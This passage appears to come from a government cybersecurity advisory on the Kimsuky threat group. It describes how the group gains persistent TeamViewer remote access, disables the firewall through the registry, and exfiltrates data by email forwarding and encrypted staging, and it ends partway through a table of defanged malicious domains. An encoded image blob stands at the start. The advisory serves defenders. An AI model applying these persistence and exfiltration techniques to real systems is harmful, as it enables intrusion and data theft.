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Hk844YDI/uitWztLmCSEzXBlCW4jYlmyz5+9jOPxxmpqQildSuRcvUUUVgMKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigArjPi7/wAkx1f/ALY/+jkrs64z4u/8kx1f/tj/AOjkoA2fBn/IkaD/ANg63/8ARa1s1jeDP+RI0H/sHW//AKLWtqgClY/em/67P/OrtUrH703/AF2f+dXaACmJ/F9afTU/i+tADqpamJzAnkiYru/eCEgSYwfu5464/CrtZXiDU5tLs4pbfyd7zCPExwMEH3Hp60AMjfUUlEc0c0kAiwx+UMw29dwI+fPGAAO+ait2vVg0gyW18ZYztny4PG0jLfN83ODnk8VD/wAJYEuWtzbeeyQ+YZIGykh2Btq5785x6c1PF4k86C2cWoRpiRiSYAcHHykZDHnpTAbFca/5Nx9ohjDCQbPKQEqvOcAthu3XHU0S/wBsbrgFpnWS1/diOONdkm0993XOOORz1qlD4tulikkntElCKvEOQp3MwDb2OAML06g8VcfxM4uhbpp0+5k8wMfu7dm7nHftj9aQEfna5bi3FvbyywmQF/PKmTZ8oYHBHP3iOvYVJJJrkFtdrErTz+d+6do0CqhJxgBstxgc4qGTxU9pLskS2u0PzedbybRj/dOeeD0J7VI3iOTfqLJEjLbWjTpEGyxKk8H0PTina4E0k17Jdae10k8MLWspnWHJ2y4Xg4z23498d8Vd0U3TaLZm/wA/ajCvmbuucd/f1qCw1GebVPskrRSr9jiuPMiGAGJIPc8HGR+NatXLRcthBRRRWYwooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigArjPi7/wAkx1f/ALY/+jkrs64z4u/8kx1f/tj/AOjkoA2fBn/IkaD/ANg63/8ARa1s1jeDP+RI0H/sHW//AKLWtqgChYSIZp49y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” style=”width: 639px; height: 266px;” /></font></font></p>

<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Figure 4: Python Script targeting MacOS</em> [57]</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Command and Control</h4>

<p>Kimsuky has used a modified TeamViewer client, version 5.0.9104, for <em>Command and Control</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0011/”>TA0011</a>] (<em>Remote Access Software</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1219/”>T1219</a>]). During the initial infection, the service “Remote Access Service” is created and adjusted to execute <code>C:WindowsSystem32vcmon.exe</code> at system startup (<em>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1547/001/”>T1547.001</a>]). Every time <code>vcmon.exe</code> is executed, it disables the firewall by zeroing out Registry values (<em>Impair Defenses: Disable or Modify System Firewall </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1562/004/”>T1562.004</a>]). The program then modifies the TeamViewer Registry settings by changing the <code>TeamViewer</code> strings in TeamViewer components. The launcher then configures several Registry values, including <code>SecurityPasswordAES</code>, that control how the remote access tool will work. The <code>SecurityPasswordAES</code> Registry value represents a hash of the password used by a remote user to connect to TeamViewer Client (Use Alternate Authentication Material: Pass the Hash [<a href=”https://attack.mitre.org/techniques/T1550/002/”>T1550.002</a>]). This way, the attackers set a pre-shared authentication value to have access to the TeamViewer Client. The attacker will then execute the TeamViewer client <code>netsvcs.exe</code>.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>58</a>]</p>

<p>Kimsuky has been using a consistent format. In the URL used recently—<code>express[.]php?op=1</code>—there appears to be an option range from 1 to 3.[59]</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Exfiltration</h4>

<p>Open-source reporting from cybersecurity companies describes two different methods Kimsuky has used to exfiltrate stolen data: via email or through an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer (<em>Exfiltration </em>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0010/”>TA0010</a>]).</p>

<p>There was no indication that the actor destroyed computers during the observed exfiltrations, suggesting Kimsuky’s intention is to steal information, not to disrupt computer networks. Kimsuky’s preferred method for sending or receiving exfiltrated information is through email, with their malware on the victim machine encrypting the data before sending it to a C2 server (<em>Archive Collected Data</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1560″>T1560</a>]).&nbsp; Kimsuky also sets up auto-forward rules within a victim’s email account (E<em>mail Collection: Email Forwarding Rule</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1114/003/”>T1114.003</a>]).</p>

<p>Kimsuky also uses an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer to exfiltrate stolen data. The data is sent RSA-encrypted (E<em>ncrypted Channel: Symmetric Cryptography</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1573/001″>T1573.001</a>]). Kimsuky’s malware constructs an 1120-bit public key and uses it to encrypt the 117-bytes buffer. The resulting data file is saved in <code>C:Program FilesCommon FilesSystemOle DB</code> (<em>Data Staged: Local Data Staging</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1074/001″>T1074.001</a>]).[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>60</a>]</p>
<h3>Mitigations</h3><h4 style=”margin-top: 8px; margin-bottom: 8px;”>Indicators of Compromise</h4>

<p style=”margin-top: 8px; margin-bottom: 8px;”><font color=”#000000″><font size=”3″>Kimsuky has used the domains listed in table 1 to carry out its objectives:</font></font></p>

<p style=”margin-bottom: 8px;”><font color=”#000000″><font size=”3″>For a downloadable copy of IOCs, see<a href=”https://us-cert.cisa.gov/sites/default/files/publications/AA20-301A.stix.xml”> AA20-301A.stix</a>.</font></font></p>

<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Table 1: Domains used by Kimsuky</em></p>

<table style=”border: medium none; width: 741px; border-collapse: collapse; margin-left: auto; margin-right: auto;”>
<tbody>
<tr height=”px | %”>
<td style=”padding: 0in 7px; border: 1px solid black; border-image: none; width: 227px;” valign=”top”>
<p><code>login.bignaver[.]com</code></p>
</td>
<td style=”border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p><code>nytimes.onekma[.]com</code></p>
</td>
<td style=”border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p><code>webuserinfo[.]com</code></p>
</td>
</tr>
<tr height=”px | %”>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p><code>member.navier.pe[.]hu</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p><code>nid.naver.onektx[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>pro-navor[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>cloudnaver[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>read.tongilmoney[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver[.]pw</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>resetprofile[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>nid.naver.unicrefia[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>daurn[.]org</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>servicenidnaver[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>mail.unifsc[[.]com </code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.com[.]de</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>account.daurn.pe[.]hu</code></p>
</td>
